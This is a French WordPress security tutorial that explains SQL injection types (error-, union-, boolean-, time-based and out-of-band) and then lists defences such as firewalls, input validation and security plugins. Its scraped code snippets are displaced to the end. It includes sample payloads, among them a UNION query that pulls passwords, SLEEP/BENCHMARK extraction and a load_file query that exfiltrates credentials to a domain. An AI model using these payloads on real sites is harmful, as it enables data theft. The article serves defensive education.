saisir un nom d’utilisateur, un mot de passe ou un numéro de téléphone, il peut vous donner une instruction SQL malveillante à la place. Celle-ci s’exécutera à votre insu dans votre base de données, ce qui risque d’exposer les données de votre site.<\/p> Voici quelques points d’entrée courants pour les attaques SQLi :<\/p> Voici un exemple d’instruction SQL normale pour sélectionner un utilisateur spécifique avec un ID utilisateur donné :<\/p> Sans aucune directive sur les entrées utilisateur, les attaquants SQLi peuvent modifier cette déclaration :<\/p> Cela renverra toutes les lignes de la table « Utilisateurs <\/strong>», exposant ainsi les informations de vos visiteurs. Les attaquants peuvent également potentiellement accéder aux mots de passe :<\/p> En utilisant l’injection SQL, les pirates peuvent découvrir les noms d’utilisateur et les mots de passe de votre site web. Si vous gérez un site de e-commerce par exemple, ces personnes malveillantes peuvent divulguer les données de paiement de vos clients et d’autres informations sensibles, ruinant ainsi votre réputation en ligne.<\/p> Maintenant que vous savez ce qu’est une injection SQL et comment elle fonctionne, examinons les différentes façons dont elle peut être exécutée. Vous serez ainsi mieux préparé pour vous défendre.<\/p> Un exemple d’attaque par injection de code SQL est le SQLi en bande. Avec cette méthode, l’attaquant peut utiliser le même canal pour insérer un code malveillant et recueillir les résultats.<\/p> Comme le SQLi en bande est simple et efficace, il s’agit d’un type d’injection SQL très répandu. Cependant, il existe deux variantes de SQLi en bande – basée sur les erreurs<\/strong> et basée sur l’union<\/strong>.<\/p> SQLi basée sur les erreurs<\/strong><\/p> Une attaque par injection SQL basée sur les erreurs est une technique qui force la base de données à produire des messages d’erreur<\/strong><\/a>. Cela permet d’obtenir des informations sur la structure de la base de données.<\/p> Les attaquants peuvent y parvenir en utilisant une commande SQL dans un paramètre de champ d’entrée. Il peut s’agir d’un simple guillemet, d’un double guillemet ou d’opérateurs tels que AND, OR ou NOT.<\/p> Par exemple, l’URL d’un site peut prendre un paramètre des visiteurs :<\/p> Dans ce cas, les attaquants peuvent ajouter un guillemet simple à la fin du paramètre :<\/p> Ce qui peut renvoyer une erreur contenant des informations sensibles :<\/p> Vous avez une erreur dans votre syntaxe SQL ; consultez le manuel correspondant à la version de votre serveur MySQL pour connaître la bonne syntaxe à utiliser près de »VALUE ».<\/p> Voici les informations qu’un pirate peut obtenir à partir de cette erreur :<\/p> Après avoir reçu cette erreur, les attaquants SQLi sauront que votre base de données n’est pas sécurisée. Cela peut leur permettre de planifier d’autres attaques par injection afin d’obtenir des données plus sensibles. Ils peuvent même utiliser une commande comme grep extract pour automatiser les options de syntaxe SQL afin de localiser d’autres erreurs.<\/p> SQLi basée sur l’union<\/strong><\/p> Une attaque par injection SQL basée sur l’union est une technique qui utilise l’opérateur SQL UNION pour combiner deux ou plusieurs instructions SELECT dans une réponse HTTP<\/strong>. Cette réponse peut contenir des données sensibles qui peuvent être exploitées.<\/p> Essentiellement, les attaquants utilisent le mot-clé SQL UNION pour obtenir des données supplémentaires par rapport à ce qui a été récupéré dans une requête initiale. Ce mot-clé permet aux pirates d’ajouter des requêtes SELECT supplémentaires à la requête initiale.<\/p> Voici comment elle peut être exécutée :<\/p> SELECT a, b FROM table1 UNION SELECT c, d FROM table2<\/p> Cette requête renverra les valeurs de deux colonnes dans un seul ensemble de résultats. Celui-ci contiendra les valeurs des colonnes A et B d’une table, ainsi que les colonnes C et D d’une autre table.<\/p> Pour que cette injection SQL fonctionne, quelques conditions doivent être remplies :<\/p> Si ces deux conditions sont remplies, les attaquants seront en mesure de récupérer les résultats de leur requête injectée. Après avoir déterminé le nombre de colonnes nécessaires et le type de données de l’utilisateur, les pirates SQLi peuvent ensuite récupérer le contenu des tables de votre base de données.<\/p> Par exemple, la requête originale peut renvoyer deux colonnes contenant des données de type chaîne. Si ces colonnes correspondent à des noms d’utilisateur et à des mots de passe, les pirates peuvent soumettre cette entrée :<\/p> ‘ UNION SELECT username, password FROM users–<\/p> Comme vous pouvez l’imaginer, les résultats de ces requêtes peuvent avoir des conséquences désastreuses. Les informations personnelles contenues sur votre site web peuvent alors être consultées et exploitées de diverses manières.<\/p> L’injection SQL inférentielle est communément appelée SQLi aveugle. Contrairement aux attaques en bande, aucune donnée n’est transférée entre l’application et le pirate. Au lieu de cela, l’attaquant envoie plusieurs requêtes à la base de données afin d’observer le comportement des réponses.<\/p> En résumé, l’attaque SQLi inférentielle consiste à évaluer la structure d’une base de données en notant la façon dont elle répond à des données spécifiques. Pour ce faire, les attaquants peuvent utiliser des techniques d’injection SQL basées sur les booléens et sur le temps.<\/p> SQLi booléenne<\/strong><\/p> La méthode d’injection basée sur les booléens est un type de SQLi inférentiel. Un attaquant interroge la base de données avec des questions de type VRAI ou FAUX et évalue la réponse. Cette technique est souvent utilisée lorsque l’application n’affiche que des messages d’erreur génériques.<\/p> L’injection booléenne prend beaucoup plus de temps pour atteindre son objectif. Comme la base de données n’envoie pas de données à la page web, l’attaquant vole des données en examinant les réponses aux questions VRAI ou FAUX. Cela peut lui permettre de savoir si la base de données est vulnérable à une injection SQL aveugle.<\/p> Par exemple, les pirates peuvent injecter une requête malveillante qui renvoie un résultat FAUX :<\/p> Si l’application ne renvoie pas de résultat, elle est probablement vulnérable à l’injection SQL. Pour s’en assurer, les attaquants injectent généralement des requêtes qui renvoient un résultat VRAI :<\/p> L’attaquant peut distinguer les retours VRAI et FAUX lorsque le contenu est différent pour chaque réponse. Cela peut lui permettre d’exploiter la base de données.<\/p> SQLi basée sur le temps<\/strong><\/p> Une autre façon de déterminer si une base de données est vulnérable à une injection SQL est d’utiliser une attaque basée sur le temps. Ce type d’injection force un délai avant l’exécution des requêtes.<\/p> En fonction du temps de réponse, les attaquants peuvent évaluer si le résultat est VRAI ou FAUX. La connaissance de cette information peut leur permettre d’exécuter des requêtes supplémentaires.<\/p> Si une attaque basée sur le temps est effectuée sur une base de données MySQL, elle utilise probablement la fonction sleep. Cette fonction demande à la base de données de retarder l’exécution de la requête pendant un certain temps :<\/p> Lorsque la réponse est retardée avec succès, l’attaquant sait alors que l’injection SQL est possible. Cela confirmera que le serveur web est une base de données MySQL, ce qui conduira à des injections de charge utile plus complexes.<\/p> Par exemple, les attaquants peuvent utiliser ce délai pour confirmer les données dans une base de données. Ils peuvent énumérer chaque lettre en demandant à la base de données de s’arrêter pendant un certain temps.<\/p> Pour les bases de données MySQL, vous pouvez implémenter l’opération BENCHMARK() pour retarder les réponses si l’expression est vraie. Voici un exemple de fonctionnement :<\/p> S’il y a un délai important dans la réponse, les attaquants peuvent supposer que le premier caractère du mot de passe pour user_id = 1 est le caractère “2”. En utilisant cette méthode, ils peuvent énumérer tous les mots de passe stockés dans votre base de données.<\/p> Une injection SQL hors bande signifie que l’attaquant n’a pas pu recevoir de réponse de l’injection sur le même canal que celui qu’il a demandé. Au lieu de cela, il peut forcer l’application à envoyer les données demandées à un point de terminaison distant et contrôlé.<\/p> Souvent, l’injection SQL hors bande peut être une alternative efficace aux attaques inférentielles. Toutefois, cette technique n’est possible que si le serveur dispose de commandes qui déclenchent des requêtes DNS ou HTTP. Heureusement pour eux, ces commandes sont courantes sur les serveurs SQL les plus répandus.<\/p> Le serveur MySQL 5.5.52 et les versions inférieures démarrent automatiquement avec une variable système globale secure_file_priv<\/strong> vide. Dans ce cas, les attaquants hors bande peuvent exfiltrer les données et créer une requête vers un nom de domaine avec une fonction load_file<\/strong>. Cela permettra de récupérer les données exfiltrées dans la requête.<\/p> Les pirates peuvent y parvenir en exécutant cette requête SQL :<\/p> En conséquence, l’application enverra une requête DNS au domaine inclus. Cela peut exposer des détails sensibles tels que la version de votre base de données, les noms d’utilisateur et les mots de passe.<\/p> Si vous construisez un site WordPress, il est important de savoir si vous devez vous préoccuper de l’injection SQL. Malheureusement, l’injection SQL est un moyen assez courant pour les pirates de compromettre ce système de gestion de contenu (CMS)<\/strong><\/a>.<\/p> Selon le rapport iThemes sur la vulnérabilité de WordPress<\/strong><\/a>, les attaques par injection SQL représentaient 9,3 % de toutes les menaces de sécurité en 2021. Bien que des facteurs tels que les requêtes de script et de falsification intersites aient été plus fréquents, il est impératif de ne pas négliger les menaces SQLi.<\/p> WordPress stocke toutes les informations de votre site web dans une base de données SQL. Cela inclut vos commentaires, vos articles, les informations sur vos clients, et bien plus encore. De plus, WordPress fonctionne en PHP<\/strong>, qui s’intègre à SQL. Étant donné que SQL fait partie intégrante de WordPress, vous êtes certainement vulnérable aux attaques par injection SQL.<\/p> En général, l’injection SQL sur WordPress est exécutée par le biais de formulaires. Les attaquants peuvent exploiter ce processus lorsque les utilisateurs soumettent des données à un script PHP contenant une requête SQL. En tant que propriétaire d’un site WordPress, il est important de maximiser votre sécurité pour éviter ce problème.<\/p> Si votre site web présente une vulnérabilité aux injections SQL, cela signifie que les attaquants peuvent accéder, modifier ou supprimer des données dans votre base de données. Heureusement, vous pouvez mettre en œuvre plusieurs pratiques de sécurité pour augmenter la sécurité de WordPress<\/strong><\/a> et éviter une attaque SQL.<\/p> L’une des meilleures façons de sécuriser votre site web contre les attaques SQLi est de mettre en place un pare-feu d’application web (WAF). Un pare-feu est un système de sécurité qui surveille le trafic réseau et bloque les activités suspectes. Il peut protéger votre site contre les injections SQL, les falsifications intersites, les scripts intersites, l’inclusion de fichiers, etc.<\/p> Cloudflare<\/strong><\/a> est un service gratuit qui fournit un pare-feu d’application web puissant pour votre site internet. Cet outil peut détecter automatiquement plusieurs variantes d’attaques SQLi.<\/p> Lorsque vous installez WordPress<\/strong><\/a>, pour la première fois, le préfixe de la base de données est automatiquement “wp_.”<\/strong> Cette option par défaut peut faciliter l’accès des pirates à vos données. Si vous ne réinitialisez pas le préfixe, les pirates peuvent facilement deviner les tables de votre base de données.<\/p> Vous pouvez rapidement modifier le préfixe de votre base de données, mais n’oubliez pas de faire une sauvegarde de votre site WordPress<\/strong><\/a> au préalable :<\/p> RENAME table `wp_tablename` TO `wp_1secure1_tablename`;<\/p> Veillez à remplacer « wp_tablename »<\/strong> par le nom de votre table actuelle. Ensuite, « wp_1secure1_tablename »<\/strong> devrait avoir votre nouveau préfixe et nom de table.<\/p> En outre, il se peut que vous deviez mettre à jour certaines valeurs de préfixe manuellement. Dans ce cas, vous pouvez filtrer vos valeurs pour trouver toutes les instances de l’ancien préfixe :<\/p> Vous pouvez ensuite modifier chaque résultat pour qu’il contienne la nouvelle valeur du préfixe. Cela devrait supprimer complètement le préfixe « wp_ » de votre base de données.<\/p> Comme nous l’avons mentionné précédemment, les pirates informatiques exécutent généralement des attaques SQLi en exploitant les données soumises par l’utilisateur. Il est donc important de sécuriser tous les champs d’entrée de votre site web, y compris les formulaires et les sections de commentaires.<\/p> Vous pouvez filtrer toutes les commandes soumises par les utilisateurs à l’aide de la validation<\/strong><\/a> et de l’assainissement des entrées. Vous pouvez protéger efficacement votre site web contre les injections SQL en vous assurant que les formulaires ne contiennent pas de chaînes de caractères supplémentaires ou de code malveillant.<\/p> Pour créer une validation d’entrée pour vos formulaires, vous devez établir des règles pour les entrées des utilisateurs. Si vous utilisez un générateur de formulaires tel que Formidable Forms<\/strong><\/a>, vous pouvez créer un format de masque d’entrée<\/strong>. Cela limitera la saisie à un ensemble spécifique de symboles.<\/p> Vous pouvez également envisager d’inclure uniquement des menus déroulants et des options à choix multiples. Le fait d’éviter les zones de texte peut empêcher les pirates d’exploiter les données de votre formulaire.<\/p> La validation des données peut également être effectuée à l’aide de fonctions. Par exemple, si vous souhaitez limiter les soumissions aux seuls codes postaux américains valides, voici la fonction que vous pouvez utiliser :<\/p> Ce code évaluera le champ wporg_zip_code pour chaque soumission en fonction de ces règles prédéfinies. Ensuite, il n’effectuera l’action que si le code postal est valide :<\/p> Pour nettoyer davantage les données soumises par les utilisateurs, vous pouvez assainir chaque entrée. Si vous souhaitez assainir une adresse électronique, vous pouvez utiliser la fonction suivante :<\/p> S’il y a des caractères supplémentaires qui ne sont pas inclus dans une adresse électronique standard, cette fonction les supprimera. Vous ne recevrez alors que des adresses électroniques valides et assainies.<\/p> Lorsque vous essayez de sécuriser votre site web, pensez à utiliser les logiciels les plus récents. Si vous vous contentez d’un logiciel de base, et que vous utilisez des thèmes et des plugins obsolètes, il y a de grandes chances que votre site internet soit vulnérable. L’utilisation d’une ancienne version de WordPress présentera probablement des failles de sécurité qui pourront être exploitées.<\/p> Pour vérifier la présence de nouvelles mises à jour, ouvrez votre tableau de bord et cliquez sur l’onglet Mises à jour<\/strong>. Vous pouvez y mettre à jour votre site web<\/strong> avec la dernière version de WordPress.<\/p> Vous pouvez également lancer des mises à jour pour les plugins et les thèmes. Toutefois, vous pouvez activer les mises à jour automatiques<\/strong> si vous ne souhaitez pas mettre à jour manuellement chaque plugin de votre site web. Pour ce faire, rendez-vous sur votre page Plugins<\/strong>. Sélectionnez ensuite l’option Activer les mises à jour automatiques<\/strong> sur le côté droit de chaque plugin.<\/p> Vous pouvez également mettre à jour automatiquement le logiciel principal de WordPress. Pour ce faire, il vous suffit d’ajouter un peu de code à votre fichier wp-config.php<\/strong> :<\/p> Vous pouvez désormais vous assurer que votre site utilise toujours le logiciel le plus récent. Grâce aux nouveaux correctifs de sécurité et aux corrections de bogues, vous n’aurez plus à vous soucier des vulnérabilités de votre codage.<\/p> Souvent, l’un des moyens les plus simples de prévenir les injections SQL est d’installer un plugin de sécurité WordPress<\/strong><\/a>. En tant que débutant, vous pouvez ainsi protéger efficacement votre site web sans avoir à modifier le code ou à effectuer d’autres tâches avancées.<\/p> Examinons quelques-uns des plugins de sécurité les plus puissants du marché.<\/p> Sucuri<\/strong><\/p> Sucuri Security<\/strong><\/a> est l’un des plugins de sécurité les plus populaires, avec plus de 800 000 installations actives. Cet outil peut protéger votre site web contre les injections SQL grâce à l’analyse des logiciels malveillants, aux notifications de sécurité et à un pare-feu.<\/p> Caractéristiques <\/strong>:<\/p> Vous pourrez consulter les journaux d’audit de sécurité de votre site web même avec la version de base de WordPress. Sucuri analysera vos fichiers principaux, notera toute activité suspecte et recommandera des actions spécifiques pour améliorer votre sécurité:<\/p> L’une des principales caractéristiques de Sucuri est son pare-feu. Il inspecte tout le trafic HTTP et HTTPS avant qu’il n’entre en contact avec votre serveur. Grâce à la détection de signatures de haute qualité, Sucuri peut bloquer toutes les requêtes malveillantes avant qu’elles ne causent des dommages.<\/p> La version premium de Sucuri peut fournir un nombre illimité de suppressions de logiciels malveillants par ses propres experts en sécurité. Vous aurez également accès à des analyses de sécurité avancées, à une atténuation des attaques DDoS et à un réseau de diffusion de contenu (CDN)<\/strong>.<\/p> Prix <\/strong>: Sucuri Security est un plugin WordPress gratuit. Cependant, si vous souhaitez accéder au pare-feu d’applications web, vous devrez acheter un plan premium<\/strong><\/a> disponible à partir de 199.99 $\/an<\/strong>.<\/p> MalCare<\/strong><\/p> MalCare<\/strong><\/a> est un autre outil efficace pour la prévention de SQLi. Ce plugin WordPress peut effectuer une recherche approfondie de logiciels malveillants sur votre site web et vous avertir de toute vulnérabilité. Avec MalCare, vous pouvez automatiquement nettoyer votre site et éviter de nombreux problèmes de sécurité WordPress<\/strong><\/a> permettant une injection SQL.<\/p> Caractéristiques <\/strong>:<\/p> Après avoir installé la version gratuite vous pourrez mettre en place une protection en temps réel contre les logiciels malveillants. MalCare analyse d’abord votre site web et vous donne un état de sécurité. Il continuera ensuite à effectuer des analyses quotidiennes des logiciels malveillants<\/p> Contrairement à Sucuri, MalCare implémente un pare-feu gratuit sur votre site web. Celui-ci peut bloquer les injections SQL, ainsi que les attaques par scripts intersites. Il fournit également une protection de la connexion, protégeant votre site contre les attaques par force brute.<\/p> Étant donné que le tableau de bord MalCare affiche des analyses pour plusieurs sites, ce plugin peut être un outil précieux pour les développeurs. Vous pouvez rapidement détecter et résoudre les problèmes de sécurité grâce aux rapports en temps réel.<\/p> Prix <\/strong>: Vous pouvez télécharger MalCare gratuitement. Si vous avez besoin d’un nettoyeur de logiciels malveillants automatisé ou de l’aide d’experts en sécurité, le plugin premium<\/strong><\/a> commence à 99 $\/an<\/strong>.<\/p> Jetpack<\/strong><\/p> Jetpack<\/strong><\/a> peut être une option efficace si vous recherchez un plugin tout-en-un que vous pouvez utiliser pour gérer les performances de votre site. Cet outil vous permet de renforcer la sécurité, le marketing, la conception et la vitesse du site<\/strong><\/a>.<\/p> Caractéristiques <\/strong>:<\/p> Vous pouvez surveiller en permanence votre site web pour détecter toute injection SQL potentielle grâce à l’analyse des logiciels malveillants. À titre préventif, vous pouvez sauvegarder les fichiers de votre site et ainsi facilement récupérer les données après une attaque.<\/p> Jetpack peut également améliorer la diffusion de votre contenu car il est fourni avec un CDN gratuit qui optimise automatiquement vos images <\/strong>pour un chargement rapide. En d’autres termes, vous protégez votre site web des injections SQL et vous vous assurez que les visiteurs bénéficient d’une bonne expérience.<\/p> Prix <\/strong>: Jetpack est un plugin WordPress gratuit. Jetpack Security<\/strong><\/a> commence à 10 $\/mois<\/strong> pour la détection des logiciels malveillants en temps réel et les sauvegardes.<\/p>Comment fonctionne l’injection SQL sur WordPress<\/strong><\/h2>
\n
\n
txtUserId = getRequestString(\"UserId\");<\/pre>\n\n\n\n
txtSQL = \"SELECT * FROM Users WHERE UserId = \" + txtUserId;<\/pre>\n<\/div><\/div>
SELECT * FROM Users WHERE UserId = 105 OR 1=1;<\/pre>
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;<\/pre>
Les types d’attaques par injection SQL<\/strong><\/h2>
SQLi en bande (In-Band)<\/strong><\/h3>
https:\/\/www.example.org\/index.php?item=123<\/pre>
https:\/\/www.example.org\/index.php?item=123′<\/pre>
\n
\n
SQLi inférentiel (inferential)<\/strong><\/h3>
http:\/\/example.com\/items.php?id=2 and 1=2<\/pre>
http:\/\/newspaper.com\/items.php?id=2 and 1=1<\/pre>
select * from comments<\/pre>
WHERE post_id=1-SLEEP(15);<\/pre>
1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;<\/pre>SQLi hors bande (Out-of-Band)<\/strong><\/h3>
SELECT load_file(CONCAT('\\\\\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\\\test.txt'))<\/pre>Quelle est la fréquence des attaques d’injection SQL sur WordPress ?<\/strong><\/h2>
<\/a><\/figure><\/div>Comment bloquer l’injection SQL dans WordPress (9 méthodes)<\/strong><\/h2>
1. Mettez en place un pare-feu<\/strong><\/h3>
<\/figure><\/div>2. Changez le préfixe de la base de données de WordPress<\/strong><\/h3>
\n
<\/figure><\/div>\n
<\/figure><\/div>\n
<\/figure><\/div>\n
<\/figure><\/div>\n
<\/figure><\/div>\n
<\/figure><\/div>\n
SELECT * FROM `wp_1secure1_tablename` WHERE `field_name` LIKE '%wp_%'<\/pre>
3. Validez les entrées des utilisateurs<\/strong><\/h3>
<\/figure><\/div>\n
\n
\/**\n\n * Validate a US zip code.\n\n *\n\n * @param string $zip_code RAW zip code to check.\n\n *\n\n * @return bool true if valid, false otherwise.\n\n *\/\n\nfunction wporg_is_valid_us_zip_code( $zip_code ) {\n\n \/\/ Scenario 1: empty.\n\n if ( empty( $zip_code ) ) {\n\n return false;\n\n }\n\n \/\/ Scenario 2: more than 10 characters.\n\n if ( 10 < strlen( trim( $zip_code ) ) ) {\n\n return false;\n\n }\n\n \/\/ Scenario 3: incorrect format.\n\n if ( ! preg_match( '\/^\\d{5}(\\-?\\d{4})?$\/', $zip_code ) ) {\n\n return false;\n\n }\n\n \/\/ Passed successfully.\n\n return true;\n\n}<\/pre>\n<\/blockquote>\n<\/div>\n<\/div>\n<\/blockquote>if ( isset( $_POST['wporg_zip_code'] ) && wporg_is_valid_us_zip_code( $_POST['wporg_zip_code'] ) ) {\n\n \/\/ your action\n\n}<\/pre>function sanitize_email( $email ) {\n\n \/\/ Test for the minimum length the email can be.\n\n if ( strlen( $email ) < 6 ) {<\/pre>4. Effectuez des mises à jour fréquentes<\/strong><\/h3>
<\/figure><\/div><\/figure><\/div>define('WP_AUTO_UPDATE_CORE', true);<\/pre>5. Installez un plugin d’injection SQL pour WordPress<\/strong><\/h3>
<\/figure><\/div>\n
<\/figure><\/div><\/figure><\/div>\n
<\/figure><\/div><\/figure><\/div>\n
6. Limitez les privilèges d’accès des utilisateurs<\/strong><\/h3>